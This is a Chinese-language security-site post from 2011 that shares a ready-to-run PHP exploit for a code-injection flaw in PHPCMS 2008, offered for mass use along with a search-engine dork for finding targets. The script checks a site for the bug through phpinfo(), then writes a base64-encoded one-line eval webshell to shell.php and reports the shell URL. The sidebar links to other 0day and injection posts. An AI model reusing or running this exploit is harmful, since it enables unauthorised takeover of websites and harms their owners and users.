会员投稿
投稿指南phpcms 2008最新0day加批量EXP代码 2011年11月
日期:2011-11-02
点击:104
来源: 未知
玩滥了,丢给大家玩吧。现在命中率还不错哦。直接GETSHELL。一句话密码为c
EXP:
#!/usr/bin/php <?php print_r(' +---------------------------------------------------------------------------+ PHPCMS Remote Code Inject GetShell Exploit Google Dork:Powered by Phpcms 2008 code by secr +---------------------------------------------------------------------------+ '); if ($argc < 3) { print_r(' +---------------------------------------------------------------------------+ Usage: php '.$argv[0].' host path host: target server (ip/hostname) path: path to phpcms Example: php '.$argv[0].' localhost /phpcms/ +---------------------------------------------------------------------------+ '); exit; } error_reporting(0); set_time_limit(0); $host = $argv[1]; $path = $argv[2]; $exp ='/yp/product.php?view_type=1&catid=&pagesize={${fputs(fopen(base64_decode(c2hlbGwucGhw),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}}&areaname=0&order='; //检测是否存在漏洞 echo "[+] Try to determine the Bug....n"; $returnstr=httpRequestGET('/yp/product.php?view_type=1&catid=&pagesize={${phpinfo()}}&areaname=&order='); if(preg_match('/(php.ini)/i',$returnstr)){ echo("[+] This site has Bug!We Will Be Try To Exploit Itn"); } else { exit("[-] Exploit Failed! This site has No Bug!n"); } //如果存在漏洞,就发送EXP Getshell echo "[+] Try to create webshell....n"; httpRequestGET($exp); $content=httpRequestGET("/yp/shell.php"); //发送EXP后,在获取的shell检测时候页面里有OK字符,如果有,则GETWebshell成功。 //print_r($content); if(strpos($content,'ok')){ echo "[+] Expoilt successfully....n"; echo "[+] Webshell:http://$host{$path}yp/shell.phpn"; }else{ exit("[-] Exploit Failed!n"); } //模拟POST或者GET请求函数。 function httpRequestGET($url){ global $host, $path; $method=$method?'POST':'GET'; $payload = $method." ".$path.$url." HTTP/1.1rn"; $payload .= "Accept: */*rn"; $payload .= "User-Agent: Payb-Agentrn"; $payload .= "Host: " . $host . "rn"; $payload .= "Connection: Closernrn"; $fp = fsockopen(gethostbyname($host), 80); if (!$fp) { echo 'No response from '.$host; die; } fputs($fp, $payload); $resp = ''; while ($fp && !feof($fp)) $resp .= fread($fp, 1024); return $resp; } ?> |
Tags:
相关文章列表:
推荐内容
最新文章
- linux下nmap的使用-linux网络扫描技术
- dedecms 5.5 0day 转载
- PHP推荐禁用函数disable_functions PHP安全配置
- Aspcms 1.5 COOKIES注入0day
- (CentOS+Nginx+PHP+Mysql)配置和WEB服务器安全配置
- espcms最新注入0day
- emseasy最新注入漏洞
- 史上最全的各个脚本的一句话木马
- Linux 递归经典:fork 炸弹
- phpcms 2008最新0day加批量EXP代码 2011年11月
- SiteServer 3.4.4最新SQL注入0day
- ECSHOP 2.7.2最新盲注漏洞
- C语言之父丹尼斯·里奇也登船了
- 微软WP7手机系统摄像头非法跟踪用户坐标
- 黑客称德国绿坝时时监控网络用户
关于我们 - 联系我们 - 广告服务 - 友情链接 - 网站地图 - 版权声明 - 发展历史